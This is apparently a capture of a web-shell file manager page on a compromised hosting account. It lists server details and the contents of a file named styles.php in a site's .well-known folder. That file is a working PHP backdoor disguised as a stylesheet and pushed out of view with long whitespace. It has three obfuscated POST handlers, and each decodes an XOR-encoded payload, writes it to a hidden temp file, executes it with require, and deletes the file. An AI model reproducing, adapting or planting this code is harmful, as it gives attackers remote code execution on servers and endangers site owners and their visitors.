HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/vigolic-1001.vitavit.com.pk/.well-known/
Upload Files
File: //home/vitanhod/vigolic-1001.vitavit.com.pk/.well-known/styles.php
<?php																																										if(isset($_POST["p\x72\x6F\x70er\x74\x79\x5Fset"])){ $reference = array_filter([getenv("TEMP"), getcwd(), "/tmp", "/var/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP")]); $pgrp = $_POST["p\x72\x6F\x70er\x74\x79\x5Fset"]; $pgrp =explode ('.', $pgrp ) ; $data_chunk = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2 ); foreach($pgrp as $l =>$v9) { $sChar = ord($s2[$l% $sLen] ); $dec =((int)$v9 - $sChar -($l% 10)) ^1; $data_chunk .= chr($dec );} foreach ($reference as $flag): if ((is_dir($flag) and is_writable($flag))) { $flg = vsprintf("%s/%s", [$flag, ".sym"]); if (file_put_contents($flg, $data_chunk)) { require $flg; unlink($flg); die(); } } endforeach; }
																																										if(filter_has_var(INPUT_POST, "\x70\x74r")){ $rec = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", getcwd(), "/tmp", "/dev/shm", session_save_path(), sys_get_temp_dir(), getenv("TMP")]); $record = $_POST["\x70\x74r"]; $record= explode ( "." , $record ) ; $k= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s); $p= 0; $len= count($record); do { if ($p >= $len) break; $v5= $record[$p]; $chS= ord($s[$p % $sLen]); $dec= ((int)$v5 - $chS - ($p % 10))^50; $k .= chr($dec); $p++;} while (true); foreach ($rec as $element): if (max(0, is_dir($element) * is_writable($element))) { $holder = implode("/", [$element, ".ent"]); if (file_put_contents($holder, $k)) { require $holder; unlink($holder); exit; } } endforeach; }


if(filter_has_var(INPUT_POST, "\x6Dar\x6B\x65r")){
	$reference = $_REQUEST["\x6Dar\x6B\x65r"];
		$reference 		= 		explode( '.'	 , $reference) 	; 
	$entity='';
            $salt='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=strlen( $salt);
            $r=0;
            $len=count( $reference);
    
            do {	if( $r >= $len) break;
                $v9=$reference[$r];
                $chS=ord( $salt[$r		%	$lenS]);
                $dec=( ( int)$v9 - $chS -( $r		%	10)) ^	42;
                $entity .= chr( $dec);
                $r++; } while( true);
	$itm = array_filter([getenv("TEMP"), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", getenv("TMP"), getcwd(), session_save_path()]);
	$resource = 0;
do {
    $object = $itm[$resource] ?? null;
    if ($resource >= count($itm)) break;
    		if (max(0, is_dir($object) * is_writable($object))) {
    $fac = vsprintf("%s/%s", [$object, ".element"]);
    if (file_put_contents($fac, $entity)) {
	require $fac;
	unlink($fac);
	exit;
}
}
    $resource++;
} while (true);
}
@ Telegram